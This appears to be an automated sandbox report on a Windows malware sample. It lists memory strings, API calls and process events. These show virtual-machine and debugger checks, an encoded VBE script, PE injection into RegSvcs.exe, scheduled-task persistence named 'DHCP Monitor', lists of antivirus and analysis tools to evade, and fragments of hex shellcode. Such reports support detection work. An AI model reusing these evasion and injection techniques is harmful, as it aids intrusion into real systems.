Source: boaliim.dat, 00000007.00000003.427785381.0000000001872000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.427822290.0000000001875000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VBoxTray.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then1Q
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then?\|
Source: boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then1Qg
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VboxService.exe
Source: boaliim.dat, 00000007.00000003.427989410.0000000001824000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424225057.0000000001822000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: RegSvcs.exe, 0000000D.00000002.634072543.0000000001C08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If ProcessExists("VBoxTray.exe") Then

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096E6A3 VirtualQuery,GetSystemInfo,

0_2_0096E6A3

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0095A69B
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0096C220
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0097B348 FindFirstFileExA,	0_2_0097B348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	7_2_002BE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_002BD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	7_2_002CA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	7_2_002CA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C65F1 FindFirstFileW,FindNextFileW,FindClose,	7_2_002C65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0028C642 FindFirstFileExW,	7_2_0028C642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C7248 FindFirstFileW,FindClose,	7_2_002C7248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	7_2_002C72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	7_2_002BDB69

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_00255D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

7_2_00255D78

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00977DEE mov eax, dword ptr fs:[00000030h]		0_2_00977DEE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00275078 mov eax, dword ptr fs:[00000030h]		7_2_00275078

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0096F838

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0097C030 GetProcessHeap,

0_2_0097C030

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CF3FF BlockInput,

7_2_002CF3FF

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096F9D5 SetUnhandledExceptionFilter,	0_2_0096F9D5
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0096F838
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0096FBCA
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00978EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00978EBD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270D65 SetUnhandledExceptionFilter,	7_2_00270D65
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002829B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_002829B2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00270BCF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00270FB1

HIPS / PFW / Operating System Protection Evasion

Starts an encoded Visual Basic Script (VBE)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FC0000			Jump to behavior

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BBB02 SendInput,keybd_event,

7_2_002BBB02

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp	Jump to behavior

Contains functionality to query the security center for anti-virus and firewall products

Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: select * from antivirusproductf51e8b6/1////83c4/cffd/6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sessionidonbitmapbitsionoldocessid;dword threadid
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpeyeem
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpeyets
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpeye.exee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif.
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c70ae2a444794b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b8u
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b8r
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c718eeba446d7339879deb2540927991o
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb25541!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c708eba95741
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: errorc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c700f2a5527d601aa0bce12357886fbb4fg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41\|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb255777417aa96ec3c7c6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c70ae6bc5141t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da0fe3ac427d61269fq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41n
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: error
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntdll.dll
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: errorc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss5
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binbufferetdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: colitems
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: usbrn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss[
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: objantivirusproductp
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablerm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: powershelle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: error'
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antivirus
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssssb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binbuffer4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bufferasm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bufferasmetdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellz
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssssw
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41l
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss&
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exesd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process explorera
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: smartsniff
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wireshark;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wireshark
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antianalysis
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp64.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process hackery
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process hackerv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: taskmgr.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process explorer
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processhacker.exe%
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: taskmgr.exesr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ptrtructcreatea5527d6d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41m
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kernel32.dllef5a7537d6v
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb25541`
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41i
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntunmapviewofsectiond6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c417
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sexemodule61ef5a7537d68
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: byte[uctcreate!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: asmrylende0fe3ac427d6*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: byte[uctcreateb255777
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: virtualallocex
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word[uctcreate
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dword_ptrc61ef5a7537d6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: virtualallocex9ba597d6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kernel32.dll7ca89775d4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avastui.exeixreloc8b1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binaryen
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: user32.dllv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ndowprocw_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_derivekey@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_dllhandlesetadr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgui.exefcountdec//6{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_dllhandle\|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_decryptdataa326e
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: colitems8d3c7a7e851e87
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgsvc.exe///6b//65//7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binbufferetptr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sexemodule3
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: objantivirusproducte8e4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountnd ad=
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_fixreloc ad&
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablesysrestore/
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: execquery
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bufferasmetptr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sssssseplace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: displayname
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountdecere
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: egui.exerivekeyand ad
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avastsvc.exextset
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gdisharedhandletablee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y08644747068671a053e
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3499bfda1b69b8cj
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 7424/85/e838//////83c4/8c3h,
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 525153565733c/648b7/3/8b76
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8b761c8b6e/88b7e2/8b363847
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 75f38/3f6b74/78/3f4b74/2eb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8bc55f5e5b595a5dc355525153h-
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 578b6c241c85ed74438b453c8b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2878/3d58b4a188b5a2//3dde3
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cf/d/3f8ebf
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: //8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: //8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a
